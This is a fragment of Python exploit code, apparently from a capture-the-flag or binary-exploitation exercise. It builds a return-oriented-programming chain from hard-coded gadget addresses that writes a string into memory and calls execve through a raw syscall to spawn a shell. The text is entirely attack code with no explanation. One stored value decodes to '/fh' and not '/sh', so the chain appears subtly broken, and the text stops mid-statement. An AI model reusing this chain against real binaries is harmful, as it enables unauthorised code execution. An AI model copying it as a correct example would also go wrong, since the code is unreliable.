payload = p64(0x409c75)
#0x0000000000409c75: pop rdx; ret 1; 
payload += p64(0x429070)+p64(0x4017d3)+"\x00"*1
# 0x00000000004017d3: pop rdi; ret; 
payload += p64(0x6e69622f)+p64(0x41c770)
# 0x000000000041c770: xchg edi, eax; ret 0; 
payload += p64(0x422de2)
# 0x0000000000422de2: mov dword ptr [rdx], eax; xor eax, eax; ret; 
payload += p64(0x409c75)
# 0x0000000000409c75: pop rdx; ret 1; 
payload += p64(0x429074)+p64(0x4017d3)+"\x00"*1
# 0x00000000004017d3: pop rdi; ret; 
payload += p64(0x68662f)+p64(0x41c770)
# 0x000000000041c770: xchg edi, eax; ret 0; 
payload += p64(0x422de2)
# 0x0000000000422de2: mov dword ptr [rdx], eax; xor eax, eax; ret; 
payload += p64(0x4017d3)
# 0x00000000004017d3: pop rdi; ret; 
payload += p64(0x3b)+p64(0x41c770)
# 0x000000000041c770: xchg edi, eax; ret 0; 
payload += p64(0x409c75)
# 0x0000000000409c75: pop rdx; ret 1; 
payload += p64(0x0)+p64(0x4017d3)+"\x00"*1
# 0x00000000004017d3: pop rdi; ret; 
payload += p64(0x429070)+p64(0x4017d1)
# 0x00000000004017d1: pop rsi; pop r15; ret; 
payload += p64(0x0)+p64(0x0)+p64(0x40cd9b)
# 0x000000000040cd9b: syscall; ret; 
payload +=
